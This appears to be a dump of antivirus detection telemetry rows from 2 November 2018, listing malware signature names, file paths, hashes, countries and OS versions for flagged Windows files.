  Row(detection=Row(filename='avscan-20181102-102520-cdd5b765', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-102517-CD13CF60\\AVSCAN-20181102-102520-CDD5B765', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:25:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094408-1d7b7cca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_106c5980\\AVSCAN-20181102-094245-153BFDD3\\AVSCAN-20181102-094408-1D7B7CCA', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:44:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110442-2e8bb67c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8cb68e92\\AVSCAN-20181102-110419-2AFEFE56\\AVSCAN-20181102-110442-2E8BB67C', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093342-7b084e26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea81adcc\\AVSCAN-20181102-093329-787126EF\\AVSCAN-20181102-093342-7B084E26', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:33:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102557-d507ef97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43dae44a\\AVSCAN-20181102-102458-C95812D8\\AVSCAN-20181102-102557-D507EF97', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151337-f83bde70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_058a7ebc\\AVSCAN-20181102-151255-F305A378\\AVSCAN-20181102-151337-F83BDE70', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:11:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191255-783c0ed0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77aa914e\\AVSCAN-20181102-191229-75ACF0CF\\AVSCAN-20181102-191255-783C0ED0', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:12:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T08:42:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T15:53:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T08:27:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161644-43713ff1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_668bca38\\AVSCAN-20181102-161522-3ADA3DDA\\AVSCAN-20181102-161644-43713FF1', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='Z:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T09:24:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092848-40b136a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea81adcc\\AVSCAN-20181102-092836-3E544B1D\\AVSCAN-20181102-092848-40B136A5', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:28:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T19:11:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092817-3a734dae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea81adcc\\AVSCAN-20181102-092802-377AB97F\\AVSCAN-20181102-092817-3A734DAE', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:28:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T19:50:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113507-e7f7f10a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b3776509\\AVSCAN-20181102-113455-E5A17C9C\\AVSCAN-20181102-113507-E7F7F10A', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211904-2ed60b5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e83dc89\\AVSCAN-20181102-211853-2D8FF3F2\\AVSCAN-20181102-211904-2ED60B5E', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113744-07e069f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b3776509\\AVSCAN-20181102-113732-05850B86\\AVSCAN-20181102-113744-07E069F6', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:43:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='I:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T12:46:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201203-957c66b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce4c9676\\AVSCAN-20181102-201145-9317B77C\\AVSCAN-20181102-201203-957C66B8', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4674872, timestamp='2018-11-02T10:15:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211707-212bf010', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e83dc89\\AVSCAN-20181102-211655-1FCF5230\\AVSCAN-20181102-211707-212BF010', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161753-4a9aafd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_668bca38\\AVSCAN-20181102-161640-4307E30A\\AVSCAN-20181102-161753-4A9AAFD1', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T20:13:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191108-6dddc0f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77aa914e\\AVSCAN-20181102-191041-6B298E07\\AVSCAN-20181102-191108-6DDDC0F1', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T15:15:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211603-19c0736e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e83dc89\\AVSCAN-20181102-211553-1891F42A\\AVSCAN-20181102-211603-19C0736E', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T18:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165655-0605cce5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aae89d63\\AVSCAN-20181102-165616-014D4776\\AVSCAN-20181102-165655-0605CCE5', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:56:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170757-56b74070', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aae89d63\\AVSCAN-20181102-170730-537F3516\\AVSCAN-20181102-170757-56B74070', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:07:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205208-d2532a96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14e04295\\AVSCAN-20181102-205128-CAA7FD8B\\AVSCAN-20181102-205208-D2532A96', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205154-cf9d5856', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14e04295\\AVSCAN-20181102-205023-BE4BC89B\\AVSCAN-20181102-205154-CF9D5856', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='watermark.exe', filepath='C:\\Program Files\\Microsoft\\WaterMark.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3632b39bd4d9197a14b2d1c1745b220f2d12c26a4d3efd42b269c7620cccbc82', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:37:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fdddceceaffbbfbdfcaaaeeaaccfbdfdbdcbbfdddddcf.fdddceceaffbbfbdfcaaaeeaaccfbdfdbdcbbfdddddcf', filepath='E:\\\xa0\\fdddceceaffbbfbdfcaaaeeaaccfbdfdbdcbbfdddddcf.fdddceceaffbbfbdfcaaaeeaaccfbdfdbdcbbfdddddcf', filesize=6528000, name='WORM/Lodbak.Gen.#M300.#R7758'), hash='3672a687f3861ef6834d437102378b9b5720315ef6d559b03fc2aa7bf17d088c', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:26:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-192812-c40d5460', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-192718-BB426F5A\\AVSCAN-20181101-192812-C40D5460', filesize=6528000, name='WORM/Lodbak.Gen.#M300.#R7758'), hash='3672a687f3861ef6834d437102378b9b5720315ef6d559b03fc2aa7bf17d088c', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211059-c5998f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211059-C5998F2C', filesize=2732000, name='ADWARE/PullUpdate.Gen7.#M1.#R1'), hash='36737fdec959599bcadd83a1e629a595b32974d2de7b93fc56e4a8c844995aff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:11:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211406-dfa1a8a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211406-DFA1A8A2', filesize=2732000, name='ADWARE/PullUpdate.Gen7.#M1.#R1'), hash='36737fdec959599bcadd83a1e629a595b32974d2de7b93fc56e4a8c844995aff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rthdvcpl.exe', filepath='C:\\Program Files\\Realtek\\Audio\\HDA\\RtHDVCpl.exe', filesize=15008000, name='W32/Sality.AT.#M1.#R1'), hash='368684a02a35a40a9369f5ca3da67d8a808719a15cc05a05609f3d13bd1aa020', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:24:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\36A923DC3A8D30639F68EED2531E7D5052B4C7EA466EB591E6153E15B5EFF975', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:53:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\36A923DC3A8D30639F68EED2531E7D5052B4C7EA466EB591E6153E15B5EFF975', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='36a923dc3a8d30639f68eed2531e7d5052b4c7ea466eb591e6153e15b5eff975', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:33:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatehwe.exe', filepath='\\\\?\\C:\\UMTool\\UltimateHwe\\UltimateHWE.exe', filesize=5696000, name='HEUR/AGEN.1017632.#M1.#R1'), hash='36ebba073148efd4ea8ae03d7eeeb218b1999939fd9aca32c40c1c10d91bdd5d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:40:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatehwe.exe', filepath='\\\\?\\C:\\UMTool\\UltimateHwe\\UltimateHWE.exe', filesize=5696000, name='HEUR/AGEN.1017632.#M1.#R1'), hash='36ebba073148efd4ea8ae03d7eeeb218b1999939fd9aca32c40c1c10d91bdd5d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:53:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:34Z'), dt=datetime.date(2018, 11, 2)),
